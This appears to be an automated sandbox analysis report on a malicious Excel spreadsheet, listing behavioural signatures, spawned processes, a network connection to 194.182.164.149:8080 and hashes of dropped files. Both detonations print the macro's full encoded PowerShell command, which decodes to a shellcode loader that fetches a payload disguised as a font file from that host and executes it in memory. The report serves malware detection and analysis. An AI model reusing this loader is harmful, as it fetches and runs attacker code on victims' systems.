Analysis Overview
SHA256
c0c6fd29fb0e19068878eceea6dac88812454f226d96f9244851bfd0df89e77c
Threat Level: Known bad
The file c0c6fd29fb0e19068878eceea6dac88812454f226d96f9244851bfd0df89e77c was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Command and Scripting Interpreter: PowerShell
Office macro that triggers on suspicious action
Blocklisted process makes network request
System Location Discovery: System Language Discovery
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Checks processor information in registry
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-13 21:56
Signatures
Office macro that triggers on suspicious action
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 21:56
Reported
2024-11-13 21:57
Platform
win7-20240903-en
Max time kernel
16s
Max time network
17s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\c0c6fd29fb0e19068878eceea6dac88812454f226d96f9244851bfd0df89e77c.xls
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\-clt0ezx.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBE60.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBE5F.tmp"
Network
| Country | Destination | Domain | Proto |
| CH | 194.182.164.149:8080 | tcp |
Files
memory/3000-1-0x00000000724CD000-0x00000000724D8000-memory.dmp
memory/3000-0-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/3000-2-0x00000000003D0000-0x00000000004D0000-memory.dmp
memory/3000-9-0x00000000003D0000-0x00000000004D0000-memory.dmp
memory/3000-8-0x00000000003D0000-0x00000000004D0000-memory.dmp
memory/3000-3-0x00000000003D0000-0x00000000004D0000-memory.dmp
memory/3000-7-0x00000000003D0000-0x00000000004D0000-memory.dmp
memory/3000-6-0x00000000003D0000-0x00000000004D0000-memory.dmp
memory/3000-4-0x00000000003D0000-0x00000000004D0000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\-clt0ezx.cmdline
| MD5 | e7ae6b283d6444a1d1e724fc421551d0 |
| SHA1 | 6d956d316f574e3d6cf74deea5bc0137a6ca0310 |
| SHA256 | 540e864c68a6c016c32278965239357eeb8ba2308ff79b3845ba1abc56772f04 |
| SHA512 | b3e96c63621c77241a8fa1d344c46965a58d1e305cbd4f4230c9c34f897961d625005a001c22e03724bef82a862d253e7cc47cb5dd2decb1da422c4eea3bc33e |
\??\c:\Users\Admin\AppData\Local\Temp\-clt0ezx.0.cs
| MD5 | f4dd5c682eb7b3b679f084261bfc7c4c |
| SHA1 | 70f75d7a4e42c185eb09139ed3c6f7338a2219c2 |
| SHA256 | 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319 |
| SHA512 | 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d |
\??\c:\Users\Admin\AppData\Local\Temp\CSCBE5F.tmp
| MD5 | c9bdad78629dd58bff47d3f4d2ebe254 |
| SHA1 | 216a043c403bb6478a86843b0316c0864e273aae |
| SHA256 | 2dbf83cacdc7827e1abad2dd01f9d766cd81b5f3846cc5b2381a719ed13b2258 |
| SHA512 | b5279c94d40d121895f1818e169372c9876aef14bac05e165efd9927956caa9c5052b146effb1c481e1922f187ca23c708319cba6f644d52298508b42728137f |
C:\Users\Admin\AppData\Local\Temp\RESBE60.tmp
| MD5 | 95a2ce51bea89a94c3ba114695b20ca3 |
| SHA1 | 530d762b8e66689b95b615a5008b437d7b9b4e2d |
| SHA256 | 7b93c733cb3cbf7107db74da6d1a8d48797a8af8f8523d5cb6dc3b5d0ca820e9 |
| SHA512 | bf4cc8343e6934cec4c42afed36022c6684dd0a98b835bd17daeb332a95aa9be187ef5380c6debd614034cf8cada1928ad5a346be32e5c5ff3bb94477c9beca4 |
C:\Users\Admin\AppData\Local\Temp\-clt0ezx.dll
| MD5 | 72d4364b9d808c59025d07a438bc0dee |
| SHA1 | 961b8ad40c1926b3c32b113cbf1582a39fd0d59e |
| SHA256 | f96894db88bdc1ab36250db4807bf4acb0797aeec7e94a9bdd84434d318ce9d9 |
| SHA512 | 7b3632d43ab4cb82c357b2d8eafe4cfc541e8ac1ac6e3b14f33ebb912e403f4a5a5c12f3bd0d6d83e168cc35cc219b300208c11542f723fb95f60ee3276c8e0d |
C:\Users\Admin\AppData\Local\Temp\-clt0ezx.pdb
| MD5 | f0e8ca1b3ccf157c485264d26b759253 |
| SHA1 | 11c92f90fcb97b63af1a45bd22e8957636c0393d |
| SHA256 | 6dfe410e7d2a90ed23a140330f9d3a9afb707b521ba557a4657fea172174a42c |
| SHA512 | ed746861ffbbf4e96b0705e389417afaef0f73139282b52a706875b15f64ecb166d109ac92885fe0029e03973c39d496edc691430400d726de02f96ad4af2c3b |
memory/3000-27-0x00000000724CD000-0x00000000724D8000-memory.dmp
memory/3000-28-0x00000000003D0000-0x00000000004D0000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-13 21:56
Reported
2024-11-13 21:57
Platform
win10v2004-20241007-en
Max time kernel
33s
Max time network
34s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2740 wrote to memory of 1608 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2740 wrote to memory of 1608 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1608 wrote to memory of 2192 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| PID 1608 wrote to memory of 2192 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| PID 2192 wrote to memory of 4516 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
| PID 2192 wrote to memory of 4516 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\c0c6fd29fb0e19068878eceea6dac88812454f226d96f9244851bfd0df89e77c.xls"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xgxcbx5f\xgxcbx5f.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE203.tmp" "c:\Users\Admin\AppData\Local\Temp\xgxcbx5f\CSC79D89201E5314359B4A516A77BDE6E6F.TMP"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| GB | 52.109.32.7:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 7.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| CH | 194.182.164.149:8080 | tcp | |
| US | 8.8.8.8:53 | 213.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.12.20.2.in-addr.arpa | udp |
Files
memory/2740-0-0x00007FFE98890000-0x00007FFE988A0000-memory.dmp
memory/2740-1-0x00007FFED88AD000-0x00007FFED88AE000-memory.dmp
memory/2740-2-0x00007FFE98890000-0x00007FFE988A0000-memory.dmp
memory/2740-4-0x00007FFE98890000-0x00007FFE988A0000-memory.dmp
memory/2740-3-0x00007FFE98890000-0x00007FFE988A0000-memory.dmp
memory/2740-6-0x00007FFED8810000-0x00007FFED8A05000-memory.dmp
memory/2740-5-0x00007FFED8810000-0x00007FFED8A05000-memory.dmp
memory/2740-8-0x00007FFED8810000-0x00007FFED8A05000-memory.dmp
memory/2740-10-0x00007FFED8810000-0x00007FFED8A05000-memory.dmp
memory/2740-12-0x00007FFED8810000-0x00007FFED8A05000-memory.dmp
memory/2740-13-0x00007FFED8810000-0x00007FFED8A05000-memory.dmp
memory/2740-14-0x00007FFE96650000-0x00007FFE96660000-memory.dmp
memory/2740-11-0x00007FFED8810000-0x00007FFED8A05000-memory.dmp
memory/2740-15-0x00007FFE96650000-0x00007FFE96660000-memory.dmp
memory/2740-7-0x00007FFE98890000-0x00007FFE988A0000-memory.dmp
memory/2740-9-0x00007FFED8810000-0x00007FFED8A05000-memory.dmp
memory/2740-16-0x00007FFED8810000-0x00007FFED8A05000-memory.dmp
memory/2740-18-0x00007FFED8810000-0x00007FFED8A05000-memory.dmp
memory/2740-20-0x00007FFED8810000-0x00007FFED8A05000-memory.dmp
memory/2740-19-0x00007FFED8810000-0x00007FFED8A05000-memory.dmp
memory/2740-17-0x00007FFED8810000-0x00007FFED8A05000-memory.dmp
memory/2740-29-0x00007FFED8810000-0x00007FFED8A05000-memory.dmp
memory/2740-30-0x00007FFED8810000-0x00007FFED8A05000-memory.dmp
memory/1608-36-0x000001F2A0670000-0x000001F2A0692000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mdhuqneh.oor.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
\??\c:\Users\Admin\AppData\Local\Temp\xgxcbx5f\xgxcbx5f.cmdline
| MD5 | b86f939d2ed1235a9230158a687166d6 |
| SHA1 | 6886cd443e0f7204c615f736423beca01edab89b |
| SHA256 | bf2969a10156d3cdfd9648b9ed4573e539f0e182092cbca1bfa28ece81d17e47 |
| SHA512 | aa994f017dfe9e9b26a2e1e73f531a2d461bce290c3bb58cdac5a47df86c10dd855a5073144b04aa213ce66259f8ed7dd2e608c80ef360b914eb3320e50d80db |
\??\c:\Users\Admin\AppData\Local\Temp\xgxcbx5f\xgxcbx5f.0.cs
| MD5 | f4dd5c682eb7b3b679f084261bfc7c4c |
| SHA1 | 70f75d7a4e42c185eb09139ed3c6f7338a2219c2 |
| SHA256 | 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319 |
| SHA512 | 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d |
\??\c:\Users\Admin\AppData\Local\Temp\xgxcbx5f\CSC79D89201E5314359B4A516A77BDE6E6F.TMP
| MD5 | 8b182aefbbb2c445c787b991fc155de1 |
| SHA1 | f5f5cb2055021bd4315812fe92c7bce604666fb8 |
